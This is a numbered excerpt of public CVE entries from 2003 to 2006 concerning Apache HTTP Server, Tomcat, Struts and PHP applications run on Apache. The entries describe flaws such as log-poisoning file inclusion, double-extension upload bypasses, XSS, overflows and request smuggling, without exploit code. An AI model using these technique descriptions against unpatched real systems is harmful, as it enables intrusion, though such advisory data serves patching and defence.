10672| [CVE-2006-5263] Directory traversal vulnerability in templates/header.php3 in phpMyAgenda 3.1 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language parameter, as demonstrated by a parameter value naming an Apache HTTP Server log file that apparently contains PHP code.
10673| [CVE-2006-4994] Multiple unquoted Windows search path vulnerabilities in Apache Friends XAMPP 1.5.2 might allow local users to gain privileges via a malicious program file in %SYSTEMDRIVE%, which is run when XAMPP attempts to execute (1) FileZillaServer.exe, (2) mysqld-nt.exe, (3) Perl.exe, or (4) xamppcontrol.exe with an unquoted "Program Files" pathname.
10674| [CVE-2006-4636] Directory traversal vulnerability in SZEWO PhpCommander 3.0 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Directory parameter, as demonstrated by parameter values naming Apache HTTP Server log files that apparently contain PHP code.
10675| [CVE-2006-4625] PHP 4.x up to 4.4.4 and PHP 5 up to 5.1.6 allows local users to bypass certain Apache HTTP Server httpd.conf options, such as safe_mode and open_basedir, via the ini_restore function, which resets the values to their php.ini (Master Value) defaults.
10676| [CVE-2006-4558] DeluxeBB 1.06 and earlier, when run on the Apache HTTP Server with the mod_mime module, allows remote attackers to execute arbitrary PHP code by uploading files with double extensions via the fileupload parameter in a newthread action in newpost.php.
10677| [CVE-2006-4191] Directory traversal vulnerability in memcp.php in XMB (Extreme Message Board) 1.9.6 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the langfilenew parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by header.php.
10678| [CVE-2006-4154] Format string vulnerability in the mod_tcl module 1.0 for Apache 2.x allows context-dependent attackers to execute arbitrary code via format string specifiers that are not properly handled in a set_var function call in (1) tcl_cmds.c and (2) tcl_core.c.
10679| [CVE-2006-4110] Apache 2.2.2, when running on Windows, allows remote attackers to read source code of CGI programs via a request that contains uppercase (or alternate case) characters that bypass the case-sensitive ScriptAlias directive, but allow access to the file on case-insensitive file systems.
10680| [CVE-2006-4004] Directory traversal vulnerability in index.php in vbPortal 3.0.2 through 3.6.0 Beta 1, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the bbvbplang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
10681| [CVE-2006-3918] http_protocol.c in (1) IBM HTTP Server 6.0 before 6.0.2.13 and 6.1 before 6.1.0.1, and (2) Apache HTTP Server 1.3 before 1.3.35, 2.0 before 2.0.58, and 2.2 before 2.2.2, does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated using a Flash SWF file.
10682| [CVE-2006-3835] Apache Tomcat 5 before 5.5.17 allows remote attackers to list directories via a semicolon (
10683| [CVE-2006-3747] Off-by-one error in the ldap scheme handling in the Rewrite module (mod_rewrite) in Apache 1.3 from 1.3.28, 2.0.46 and other versions before 2.0.59, and 2.2, when RewriteEngine is enabled, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted URLs that are not properly handled using certain rewrite rules.
10684| [CVE-2006-3362] Unrestricted file upload vulnerability in connectors/php/connector.php in FCKeditor mcpuk file manager, as used in (1) Geeklog 1.4.0 through 1.4.0sr3, (2) toendaCMS 1.0.0 Shizouka Stable and earlier, (3) WeBid 0.5.4, and possibly other products, when installed on Apache with mod_mime, allows remote attackers to upload and execute arbitrary PHP code via a filename with a .php extension and a trailing extension that is allowed, such as .zip.
10685| [CVE-2006-3102] Race condition in articles/BitArticle.php in Bitweaver 1.3, when run on Apache with the mod_mime extension, allows remote attackers to execute arbitrary PHP code by uploading arbitrary files with double extensions, which are stored for a small period of time under the webroot in the temp/articles directory.
10686| [CVE-2006-3070] write_ok.php in Zeroboard 4.1 pl8, when installed on Apache with mod_mime, allows remote attackers to bypass restrictions for uploading files with executable extensions by uploading a .htaccess file with an AddType directive that assigns an executable module to files with assumed-safe extensions, as demonstrated by assigning the txt extension to be handled by application/x-httpd-php.
10687| [CVE-2006-2831] Drupal 4.6.x before 4.6.8 and 4.7.x before 4.7.2, when running under certain Apache configurations such as when FileInfo overrides are disabled within .htaccess, allows remote attackers to execute arbitrary code by uploading a file with multiple extensions, a variant of CVE-2006-2743.
10688| [CVE-2006-2806] The SMTP server in Apache Java Mail Enterprise Server (aka Apache James) 2.2.0 allows remote attackers to cause a denial of service (CPU consumption) via a long argument to the MAIL command.
10689| [CVE-2006-2743] Drupal 4.6.x before 4.6.7 and 4.7.0, when running on Apache with mod_mime, does not properly handle files with multiple extensions, which allows remote attackers to upload, modify, or execute arbitrary files in the files directory.
10690| [CVE-2006-2514] Coppermine galleries before 1.4.6, when running on Apache with mod_mime installed, allows remote attackers to upload arbitrary files via a filename with multiple file extensions.
10691| [CVE-2006-2330] PHP-Fusion 6.00.306 and earlier, running under Apache HTTP Server 1.3.27 and PHP 4.3.3, allows remote authenticated users to upload files of arbitrary types using a filename that contains two or more extensions that ends in an assumed-valid extension such as .gif, which bypasses the validation, as demonstrated by uploading then executing an avatar file that ends in ".php.gif" and contains PHP code in EXIF metadata.
10692| [CVE-2006-1777] Directory traversal vulnerability in doc/index.php in Jeremy Ashcraft Simplog 0.9.2 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the s parameter, as demonstrated by injecting PHP sequences into an Apache error_log file, which is then included by doc/index.php.
10693| [CVE-2006-1564] Untrusted search path vulnerability in libapache2-svn 1.3.0-4 for Subversion in Debian GNU/Linux includes RPATH values under the /tmp/svn directory for the (1) mod_authz_svn.so and (2) mod_dav_svn.so modules, which might allow local users to gain privileges by installing malicious libraries in that directory.
10694| [CVE-2006-1548] Cross-site scripting (XSS) vulnerability in (1) LookupDispatchAction and possibly (2) DispatchAction and (3) ActionDispatcher in Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to inject arbitrary web script or HTML via the parameter name, which is not filtered in the resulting error message.
10695| [CVE-2006-1547] ActionForm in Apache Software Foundation (ASF) Struts before 1.2.9 with BeanUtils 1.7 allows remote attackers to cause a denial of service via a multipart/form-data encoded form with a parameter name that references the public getMultipartRequestHandler method, which provides further access to elements in the CommonsMultipartRequestHandler implementation and BeanUtils.
10696| [CVE-2006-1546] Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to bypass validation via a request with a 'org.apache.struts.taglib.html.Constants.CANCEL' parameter, which causes the action to be canceled but would not be detected from applications that do not use the isCancelled check.
10697| [CVE-2006-1393] Multiple cross-site scripting (XSS) vulnerabilities in the mod_pubcookie Apache application server module in University of Washington Pubcookie 1.x, 3.0.0, 3.1.0, 3.1.1, 3.2 before 3.2.1b, and 3.3 before 3.3.0a allow remote attackers to inject arbitrary web script or HTML via unspecified attack vectors.
10698| [CVE-2006-1346] Directory traversal vulnerability in inc/setLang.php in Greg Neustaetter gCards 1.45 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in a lang[*][file] parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by index.php.
10699| [CVE-2006-1292] Directory traversal vulnerability in Jim Hu and Chad Little PHP iCalendar 2.21 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the phpicalendar[cookie_language] and phpicalendar[cookie_style] cookies, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by day.php.
10700| [CVE-2006-1243] Directory traversal vulnerability in install05.php in Simple PHP Blog (SPB) 0.4.7.1 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the blog_language parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included using install05.php.
10701| [CVE-2006-1095] Directory traversal vulnerability in the FileSession object in Mod_python module 3.2.7 for Apache allows local users to execute arbitrary code via a crafted session cookie.
10702| [CVE-2006-1079] htpasswd, as used in Acme thttpd 2.25b and possibly other products such as Apache, might allow local users to gain privileges via shell metacharacters in a command line argument, which is used in a call to the system function. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
10703| [CVE-2006-1078] Multiple buffer overflows in htpasswd, as used in Acme thttpd 2.25b, and possibly other products such as Apache, might allow local users to gain privileges via (1) a long command line argument and (2) a long line in a file. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
10704| [CVE-2006-0743] Format string vulnerability in LocalSyslogAppender in Apache log4net 1.2.9 might allow remote attackers to cause a denial of service (memory corruption and termination) via unknown vectors.
10705| [CVE-2006-0254] Multiple cross-site scripting (XSS) vulnerabilities in Apache Geronimo 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) time parameter to cal2.jsp and (2) any invalid parameter, which causes an XSS when the log file is viewed by the Web-Access-Log viewer.
10706| [CVE-2006-0150] Multiple format string vulnerabilities in the auth_ldap_log_reason function in Apache auth_ldap 1.6.0 and earlier allows remote attackers to execute arbitrary code via various vectors, including the username.
10707| [CVE-2006-0144] The proxy server feature in go-pear.php in PHP PEAR 0.2.2, as used in Apache2Triad, allows remote attackers to execute arbitrary PHP code by redirecting go-pear.php to a malicious proxy server that provides a modified version of Tar.php with a malicious extractModify function.
10708| [CVE-2006-0042] Unspecified vulnerability in (1) apreq_parse_headers and (2) apreq_parse_urlencoded functions in Apache2::Request (Libapreq2) before 2.07 allows remote attackers cause a denial of service (CPU consumption) via unknown attack vectors that result in quadratic computational complexity.
10709| [CVE-2005-4857] eZ publish 3.5 before 3.5.7, 3.6 before 3.6.5, 3.7 before 3.7.3, and 3.8 before 20051128 allows remote authenticated users to cause a denial of service (Apache httpd segmentation fault) via a request to content/advancedsearch.php with an empty SearchContentClassID parameter, reportedly related to a "memory addressing error".
10710| [CVE-2005-4849] Apache Derby before 10.1.2.1 exposes the (1) user and (2) password attributes in cleartext via (a) the RDBNAM parameter of the ACCSEC command and (b) the output of the DatabaseMetaData.getURL function, which allows context-dependent attackers to obtain sensitive information.
10711| [CVE-2005-4836] The HTTP/1.1 connector in Apache Tomcat 4.1.15 through 4.1.40 does not reject NULL bytes in a URL when allowLinking is configured, which allows remote attackers to read JSP source files and obtain sensitive information.
10712| [CVE-2005-4814] Unrestricted file upload vulnerability in Segue CMS before 1.3.6, when the Apache HTTP Server handles .phtml files with the PHP interpreter, allows remote attackers to upload and execute arbitrary PHP code by placing .phtml files in the userfiles/ directory.
10713| [CVE-2005-4703] Apache Tomcat 4.0.3, when running on Windows, allows remote attackers to obtain sensitive information via a request for a file that contains an MS-DOS device name such as lpt9, which leaks the pathname in an error message, as demonstrated by lpt9.xtp using Nikto.
10714| [CVE-2005-3745] Cross-site scripting (XSS) vulnerability in Apache Struts 1.2.7, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the query string, which is not properly quoted or filtered when the request handler generates an error message.
10715| [CVE-2005-3630] Fedora Directory Server before 10 allows remote attackers to obtain sensitive information, such as the password from adm.conf via an IFRAME element, probably involving an Apache httpd.conf configuration that orders "allow" directives before "deny" directives.
10716| [CVE-2005-3510] Apache Tomcat 5.5.0 to 5.5.11 allows remote attackers to cause a denial of service (CPU consumption) via a large number of simultaneous requests to list a web directory that has a large number of files.
10717| [CVE-2005-3392] Unspecified vulnerability in PHP before 4.4.1, when using the virtual function on Apache 2, allows remote attackers to bypass safe_mode and open_basedir directives.
10718| [CVE-2005-3357] mod_ssl in Apache 2.0 up to 2.0.55, when configured with an SSL vhost with access control and a custom error 400 error page, allows remote attackers to cause a denial of service (application crash) via a non-SSL request to an SSL port, which triggers a NULL pointer dereference.
10719| [CVE-2005-3352] Cross-site scripting (XSS) vulnerability in the mod_imap module of Apache httpd before 1.3.35-dev and Apache httpd 2.0.x before 2.0.56-dev allows remote attackers to inject arbitrary web script or HTML via the Referer when using image maps.
10720| [CVE-2005-3319] The apache2handler SAPI (sapi_apache2.c) in the Apache module (mod_php) for PHP 5.x before 5.1.0 final and 4.4 before 4.4.1 final allows attackers to cause a denial of service (segmentation fault) via the session.save_path option in a .htaccess file or VirtualHost.
10721| [CVE-2005-3164] The AJP connector in Apache Tomcat 4.0.1 through 4.0.6 and 4.1.0 through 4.1.36, as used in Hitachi Cosminexus Application Server and standalone, does not properly handle when a connection is broken before request body data is sent in a POST request, which can lead to an information leak when "unsuitable request body data" is used for a different request, possibly related to Java Servlet pages.
10722| [CVE-2005-2970] Memory leak in the worker MPM (worker.c) for Apache 2, in certain circumstances, allows remote attackers to cause a denial of service (memory consumption) via aborted connections, which prevents the memory for the transaction pool from being reused for other connections.
10723| [CVE-2005-2963] The mod_auth_shadow module 1.0 through 1.5 and 2.0 for Apache with AuthShadow enabled uses shadow authentication for all locations that use the require group directive, even when other authentication mechanisms are specified, which might allow remote authenticated users to bypass security restrictions.
10724| [CVE-2005-2728] The byte-range filter in Apache 2.0 before 2.0.54 allows remote attackers to cause a denial of service (memory consumption) via an HTTP header with a large Range field.
10725| [CVE-2005-2660] apachetop 0.12.5 and earlier, when running in debug mode, allows local users to create or append to arbitrary files via a symlink attack on atop.debug.
10726| [CVE-2005-2088] The Apache HTTP server before 1.3.34, and 2.0.x before 2.0.55, when acting as an HTTP proxy, allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes Apache to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."
10727| [CVE-2005-1754] ** DISPUTED ** JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to read arbitrary files via a full pathname in the argument to the Download parameter. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
10728| [CVE-2005-1753] ** DISPUTED ** ReadMessage.jsp in JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to view other users' e-mail attachments via a direct request to /mailboxesdir/username@domainname. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
10729| [CVE-2005-1344] Buffer overflow in htdigest in Apache 2.0.52 may allow attackers to execute arbitrary code via a long realm argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
10730| [CVE-2005-1268] Off-by-one error in the mod_ssl Certificate Revocation List (CRL) verification callback in Apache, when configured to use a CRL, allows remote attackers to cause a denial of service (child process crash) via a CRL that causes a buffer overflow of one null byte.
10731| [CVE-2005-1266] Apache SpamAssassin 3.0.1, 3.0.2, and 3.0.3 allows remote attackers to cause a denial of service (CPU consumption and slowdown) via a message with a long Content-Type header without any boundaries.
10732| [CVE-2005-0808] Apache Tomcat before 5.x allows remote attackers to cause a denial of service (application crash) via a crafted AJP12 packet to TCP port 8007.
10733| [CVE-2005-0182] The mod_dosevasive module 1.9 and earlier for Apache creates temporary files with predictable filenames, which could allow remote attackers to overwrite arbitrary files via a symlink attack.
10734| [CVE-2005-0108] Apache mod_auth_radius 1.5.4 and libpam-radius-auth allow remote malicious RADIUS servers to cause a denial of service (crash) via a RADIUS_REPLY_MESSAGE with a RADIUS attribute length of 1, which leads to a memcpy operation with a -1 length argument.
10735| [CVE-2004-2734] webadmin-apache.conf in Novell Web Manager of Novell NetWare 6.5 uses an uppercase Alias tag with an inconsistent lowercase directory tag for a volume, which allows remote attackers to bypass access control to the WEB-INF folder.
10736| [CVE-2004-2680] mod_python (libapache2-mod-python) 3.1.4 and earlier does not properly handle when output filters process more than 16384 bytes, which can cause filter.read to return portions of previously freed memory.
10737| [CVE-2004-2650] Spooler in Apache Foundation James 2.2.0 allows local users to cause a denial of service (memory consumption) by triggering various error conditions in the retrieve function, which prevents a lock from being released and causes a memory leak.
10738| [CVE-2004-2343] ** DISPUTED ** Apache HTTP Server 2.0.47 and earlier allows local users to bypass .htaccess file restrictions, as specified in httpd.conf with directives such as Deny From All, by using an ErrorDocument directive. NOTE: the vendor has disputed this issue, since the .htaccess mechanism is only intended to restrict external web access, and a local user already has the privileges to perform the same operations without using ErrorDocument.
10739| [CVE-2004-2336] Unknown vulnerability in Novell GroupWise and GroupWise WebAccess 6.0 through 6.5, when running with Apache Web Server 1.3 for NetWare where Apache is loaded using GWAPACHE.CONF, allows remote attackers to read directories and files on the server.
10740| [CVE-2004-2115] Multiple cross-site scripting (XSS) vulnerabilities in Oracle HTTP Server 1.3.22, based on Apache, allow remote attackers to execute arbitrary script as other users via the (1) action, (2) username, or (3) password parameters in an isqlplus request.
10741| [CVE-2004-1834] mod_disk_cache in Apache 2.0 through 2.0.49 stores client headers, including authentication information, on the hard disk, which could allow local users to gain sensitive information.
10742| [CVE-2004-1765] Off-by-one buffer overflow in ModSecurity (mod_security) 1.7.4 for Apache 2.x, when SecFilterScanPost is enabled, allows remote attackers to execute arbitrary code via crafted POST requests.
10743| [CVE-2004-1545] UploadFile.php in MoniWiki 1.0.9.2 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.hwp, which allows remote attackers to upload and execute arbitrary code.
10744| [CVE-2004-1438] The mod_authz_svn Apache module for Subversion 1.0.4-r1 and earlier allows remote authenticated users, with write access to the repository, to read unauthorized parts of the repository via the svn copy command.
10745| [CVE-2004-1405] MediaWiki 1.3.8 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
10746| [CVE-2004-1404] Attachment Mod 2.3.10 module for phpBB, when used with Apache mod_mime, does not properly handle files with multiple file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
10747| [CVE-2004-1387] The check_forensic script in apache-utils package 1.3.31 allows local users to overwrite or create arbitrary files via a symlink attack on temporary files.
10748| [CVE-2004-1084] Apache for Apple Mac OS X 10.2.8 and 10.3.6 allows remote attackers to read files and resource fork content via HTTP requests to certain special file names related to multiple data streams in HFS+, which bypass Apache file handles.
10749| [CVE-2004-1083] Apache for Apple Mac OS X 10.2.8 and 10.3.6 restricts access to files in a case sensitive manner, but the Apple HFS+ filesystem accesses files in a case insensitive manner, which allows remote attackers to read .DS_Store files and files beginning with ".ht" using alternate capitalization.
10750| [CVE-2004-1082] mod_digest_apple for Apache 1.3.31 and 1.3.32 on Mac OS X Server does not properly verify the nonce of a client response, which allows remote attackers to replay credentials.
10751| [CVE-2004-0942] Apache webserver 2.0.52 and earlier allows remote attackers to cause a denial of service (CPU consumption) via an HTTP GET request with a MIME header containing multiple lines with a large number of space characters.
10752| [CVE-2004-0940] Buffer overflow in the get_tag function in mod_include for Apache 1.3.x to 1.3.32 allows local users who can create SSI documents to execute arbitrary code as the apache user via SSI (XSSI) documents that trigger a length calculation error.
10753| [CVE-2004-0885] The mod_ssl module in Apache 2.0.35 through 2.0.52, when using the "SSLCipherSuite" directive in directory or location context, allows remote clients to bypass intended restrictions by using any cipher suite that is allowed by the virtual host configuration.
10754| [CVE-2004-0811] Unknown vulnerability in Apache 2.0.51 prevents "the merging of the Satisfy directive," which could allow attackers to obtain access to restricted resources contrary to the specified authentication configuration.
10755| [CVE-2004-0809] The mod_dav module in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (child process crash) via a certain sequence of LOCK requests for a location that allows WebDAV authoring access.
10756| [CVE-2004-0786] The IPv6 URI parsing routines in the apr-util library for Apache 2.0.50 and earlier allow remote attackers to cause a denial of service (child process crash) via a certain URI, as demonstrated using the Codenomicon HTTP Test Tool.
10757| [CVE-2004-0751] The char_buffer_read function in the mod_ssl module for Apache 2.x, when using reverse proxying to an SSL server, allows remote attackers to cause a denial of service (segmentation fault).
10758| [CVE-2004-0748] mod_ssl in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (CPU consumption) by aborting an SSL connection in a way that causes an Apache child process to enter an infinite loop.
10759| [CVE-2004-0747] Buffer overflow in Apache 2.0.50 and earlier allows local users to gain apache privileges via a .htaccess file that causes the overflow during expansion of environment variables.
10760| [CVE-2004-0700] Format string vulnerability in the mod_proxy hook functions function in ssl_engine_log.c in mod_ssl before 2.8.19 for Apache before 1.3.31 may allow remote attackers to execute arbitrary messages via format string specifiers in certain log messages for HTTPS that are handled by the ssl_log function.
10761| [CVE-2004-0646] Buffer overflow in the WriteToLog function for JRun 3.0 through 4.0 web server connectors, such as (1) mod_jrun and (2) mod_jrun20 for Apache, with verbose logging enabled, allows remote attackers to execute arbitrary code via a long HTTP header Content-Type field or other fields.
10762| [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
10763| [CVE-2004-0493] The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.
10764| [CVE-2004-0492] Heap-based buffer overflow in proxy_util.c for mod_proxy in Apache 1.3.25 to 1.3.31 allows remote attackers to cause a denial of service (process crash) and possibly execute arbitrary code via a negative Content-Length HTTP header field, which causes a large amount of data to be copied.
10765| [CVE-2004-0490] cPanel, when compiling Apache 1.3.29 and PHP with the mod_phpsuexec option, does not set the --enable-discard-path option, which causes php to use the SCRIPT_FILENAME variable to find and execute a script instead of the PATH_TRANSLATED variable, which allows local users to execute arbitrary PHP code as other users via a URL that references the attacker's script after the user's script, which executes the attacker's script with the user's privileges, a different vulnerability than CVE-2004-0529.
10766| [CVE-2004-0488] Stack-based buffer overflow in the ssl_util_uuencode_binary function in ssl_util.c for Apache mod_ssl, when mod_ssl is configured to trust the issuing CA, may allow remote attackers to execute arbitrary code via a client certificate with a long subject DN.
10767| [CVE-2004-0263] PHP 4.3.4 and earlier in Apache 1.x and 2.x (mod_php) can leak global variables between virtual hosts that are handled by the same Apache child process but have different settings, which could allow remote attackers to obtain sensitive information.
10768| [CVE-2004-0174] Apache 1.4.x before 1.3.30, and 2.0.x before 2.0.49, when using multiple listening sockets on certain platforms, allows remote attackers to cause a denial of service (blocked new connections) via a "short-lived connection on a rarely-accessed listening socket."
10769| [CVE-2004-0173] Directory traversal vulnerability in Apache 1.3.29 and earlier, and Apache 2.0.48 and earlier, when running on Cygwin, allows remote attackers to read arbitrary files via a URL containing "..%5C" (dot dot encoded backslash) sequences.
10770| [CVE-2004-0113] Memory leak in ssl_engine_io.c for mod_ssl in Apache 2 before 2.0.49 allows remote attackers to cause a denial of service (memory consumption) via plain HTTP requests to the SSL port of an SSL-enabled server.
10771| [CVE-2004-0009] Apache-SSL 1.3.28+1.52 and earlier, with SSLVerifyClient set to 1 or 3 and SSLFakeBasicAuth enabled, allows remote attackers to forge a client certificate by using basic authentication with the "one-line DN" of the target user.
10772| [CVE-2003-1581] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, allows remote attackers to inject arbitrary text into log files via an HTTP request in conjunction with a crafted DNS response, as demonstrated by injecting XSS sequences, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
10773| [CVE-2003-1580] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, uses a logging format that does not identify whether a dotted quad represents an unresolved IP address, which allows remote attackers to spoof IP addresses via crafted DNS responses containing numerical top-level domains, as demonstrated by a forged 123.123.123.123 domain name, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
10774| [CVE-2003-1573] The PointBase 4.6 database component in the J2EE 1.4 reference implementation (J2EE/RI) allows remote attackers to execute arbitrary programs, conduct a denial of service, and obtain sensitive information via a crafted SQL statement, related to "inadequate security settings and library bugs in sun.* and org.apache.* packages."
10775| [CVE-2003-1521] Sun Java Plug-In 1.4 through 1.4.2_02 allows remote attackers to repeatedly access the floppy drive via the createXmlDocument method in the org.apache.crimson.tree.XmlDocument class, which violates the Java security model.
10776| [CVE-2003-1516] The org.apache.xalan.processor.XSLProcessorVersion class in Java Plug-in 1.4.2_01 allows signed and unsigned applets to share variables, which violates the Java security model and could allow remote attackers to read or write data belonging to a signed applet.
10777| [CVE-2003-1502] mod_throttle 3.0 allows local users with Apache privileges to access shared memory that points to a file that is writable by the apache user, which could allow local users to gain privileges.
10778| [CVE-2003-1418] Apache HTTP Server 1.3.22 through 1.3.27 on OpenBSD allows remote attackers to obtain sensitive information via (1) the ETag header, which reveals the inode number, or (2) multipart MIME boundary, which reveals child proccess IDs (PID).
10779| [CVE-2003-1307] ** DISPUTED ** The mod_php module for the Apache HTTP Server allows local users with write access to PHP scripts to send signals to the server's process group and use the server's file descriptors, as demonstrated by sending a STOP signal, then intercepting incoming connections on the server's TCP port. NOTE: the PHP developer has disputed this vulnerability, saying "The opened file descriptors are opened by Apache. It is the job of Apache to protect them ... Not a bug in PHP."
10780| [CVE-2003-1172] Directory traversal vulnerability in the view-source sample file in Apache Software Foundation Cocoon 2.1 and 2.2 allows remote attackers to access arbitrary files via a .. (dot dot) in the filename parameter.
10781| [CVE-2003-1171] Heap-based buffer overflow in the sec_filter_out function in mod_security 1.7RC1 through 1.7.1 in Apache 2 allows remote attackers to execute arbitrary code via a server side script that sends a large amount of data.
10782| [CVE-2003-1138] The default configuration of Apache 2.0.40, as shipped with Red Hat Linux 9.0, allows remote attackers to list directory contents, even if auto indexing is turned off and there is a default web page configured, via a GET request containing a double slash (//).
10783| [CVE-2003-1054] mod_access_referer 1.0.2 allows remote attackers to cause a denial of service (crash) via a malformed Referer header that is missing a hostname, as parsed by the ap_parse_uri_components function in Apache, which triggers a null dereference.
10784| [CVE-2003-0993] mod_access in Apache 1.3 before 1.3.30, when running big-endian 64-bit platforms, does not properly parse Allow/Deny rules using IP addresses without a netmask, which could allow remote attackers to bypass intended access restrictions.
10785| [CVE-2003-0987] mod_digest for Apache before 1.3.31 does not properly verify the nonce of a client response by using a AuthNonce secret.
10786| [CVE-2003-0866] The Catalina org.apache.catalina.connector.http package in Tomcat 4.0.x up to 4.0.3 allows remote attackers to cause a denial of service via several requests that do not follow the HTTP protocol, which causes Tomcat to reject later requests.
10787| [CVE-2003-0844] mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode without the Apache log, allows local users to overwrite arbitrary files via (1) a symlink attack on predictable temporary filenames on Unix systems, or (2) an NTFS hard link on Windows systems when the "Strengthen default permissions of internal system objects" policy is not enabled.
10788| [CVE-2003-0843] Format string vulnerability in mod_gzip_printf for mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode and using the Apache log, allows remote attackers to execute arbitrary code via format string characters in an HTTP GET request with an "Accept-Encoding: gzip" header.
10789| [CVE-2003-0789] mod_cgid in Apache before 2.0.48, when using a threaded MPM, does not properly handle CGI redirect paths, which could cause Apache to send the output of a CGI program to the wrong client.
10790| [CVE-2003-0771] Gallery.pm in Apache::Gallery (aka A::G) uses predictable temporary filenames when running Inline::C, which allows local users to execute arbitrary code by creating and modifying the files before Apache::Gallery does.
10791| [CVE-2003-0658] Docview before 1.1-18 in Caldera OpenLinux 3.1.1, SCO Linux 4.0, OpenServer 5.0.7, configures the Apache web server in a way that allows remote attackers to read arbitrary publicly readable files via a certain URL, possibly related to rewrite rules.
10792| [CVE-2003-0542] Multiple stack-based buffer overflows in (1) mod_alias and (2) mod_rewrite for Apache before 1.3.29 allow attackers to create configuration files to cause a denial of service (crash) or execute arbitrary code via a regular expression with more than 9 captures.
10793| [CVE-2003-0460] The rotatelogs program on Apache before 1.3.28, for Windows and OS/2 systems, does not properly ignore certain control characters that are received over the pipe, which could allow remote attackers to cause a denial of service.
10794| [CVE-2003-0254] Apache 2 before 2.0.47, when running on an IPv6 host, allows attackers to cause a denial of service (CPU consumption by infinite loop) when the FTP proxy server fails to create an IPv6 socket.
10795| [CVE-2003-0253] The prefork MPM in Apache 2 before 2.0.47 does not properly handle certain errors from accept, which could lead to a denial of service.
10796| [CVE-2003-0249] ** DISPUTED ** PHP treats unknown methods such as "PoSt" as a GET request, which could allow attackers to intended access restrictions if PHP is running on a server that passes on all methods, such as Apache httpd 2.0, as demonstrated using a Limit directive. NOTE: this issue has been disputed by the Apache security team, saying "It is by design that PHP allows scripts to process any request method. A script which does not explicitly verify the request method will hence be processed as normal for arbitrary methods. It is therefore expected behaviour that one cannot implement per-method access control using the Apache configuration alone, which is the assumption made in this report."
10797| [CVE-2003-0245] Vulnerability in the apr_psprintf function in the Apache Portable Runtime (APR) library for Apache 2.0.37 through 2.0.45 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via long strings, as demonstrated using XML objects to mod_dav, and possibly other vectors.
10798| [CVE-2003-0192] Apache 2 before 2.0.47, and certain versions of mod_ssl for Apache 1.3, do not properly handle "certain sequences of per-directory renegotiations and the SSLCipherSuite directive being used to upgrade from a weak ciphersuite to a strong one," which could cause Apache to use the weak ciphersuite.
10799| [CVE-2003-0189] The authentication module for Apache 2.0.40 through 2.0.45 on Unix does not properly handle threads safely when using the crypt_r or crypt functions, which allows remote attackers to cause a denial of service (failed Basic authentication with valid usernames and passwords) when a threaded MPM is used.
10800| [CVE-2003-0134] Unknown vulnerability in filestat.c for Apache running on OS2, versions 2.0 through 2.0.45, allows unknown attackers to cause a denial of service via requests related to device names.
10801| [CVE-2003-0132] A memory leak in Apache 2.0 through 2.0.44 allows remote attackers to cause a denial of service (memory consumption) via large chunks of linefeed characters, which causes Apache to allocate 80 bytes for each linefeed.
